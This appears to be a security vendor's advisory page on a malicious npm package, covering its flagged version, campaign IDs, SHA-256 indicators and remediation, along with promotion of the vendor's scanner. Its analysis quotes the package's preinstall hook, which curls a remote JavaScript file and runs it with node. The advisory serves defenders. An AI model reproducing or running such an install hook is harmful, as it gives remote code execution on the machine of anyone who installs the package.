Which versions of sn-internal-testjgsakjdkjadkjahsdkjad are malicious?

The following npm versions of sn-internal-testjgsakjdkjadkjahsdkjad are flagged malicious: 2.1.1. Treat any of these as compromised.

How do I remediate sn-internal-testjgsakjdkjadkjahsdkjad if I installed it?

Remove sn-internal-testjgsakjdkjadkjahsdkjad from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is sn-internal-testjgsakjdkjadkjahsdkjad part of a known attack campaign?

Yes — sn-internal-testjgsakjdkjadkjahsdkjad is associated with the IN-MAL-2026-005711, IN-MAL-2026-005710 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect sn-internal-testjgsakjdkjadkjahsdkjad in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking sn-internal-testjgsakjdkjadkjahsdkjad and packages like it before any post-install script runs.

Malicious package

sn-internal-testjgsakjdkjadkjahsdkjadnpm

Malicious code in sn-internal-testjgsakjdkjadkjahsdkjad (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-5646

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall sn-internal-testjgsakjdkjadkjahsdkjad

What this malware does

package.json declares a preinstall lifecycle hook that runs curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js. On any npm install, the script fetches an unpinned, mutable JavaScript file from poc.amanrawat.com over plain HTTPS and immediately executes it with node under the installer's user account. There is no hash or signature verification, no version pinning, and the destination is not a recognized runtime/CDN or publisher-owned host. The package name (sn-internal-testjgsakjdkjadkjahsdkjad), description ("This is our internal app for testing"), and the poc. (proof-of-concept) hostname indicate this is a dependency-confusion / supply-chain PoC, but the install-time payload is a real and unconditional remote-code-execution primitive against any installer.

Malicious versions

1 flagged

2.1.1

Indicators of compromise (SHA-256)

41f34acb7ed9ab6c864394a7258065fc250cef58f144602ba585a80ed47ea70b

b71b954927bd19d1ae8c3bef3965b4cbbaae3cc1f29c34ae6f90f36b2cd7f7fe

Frequently asked questions

No. sn-internal-testjgsakjdkjadkjahsdkjad on npm has been identified as a malicious package (version 2.1.1 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-005711IN-MAL-2026-005710

References

npmjs.com

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection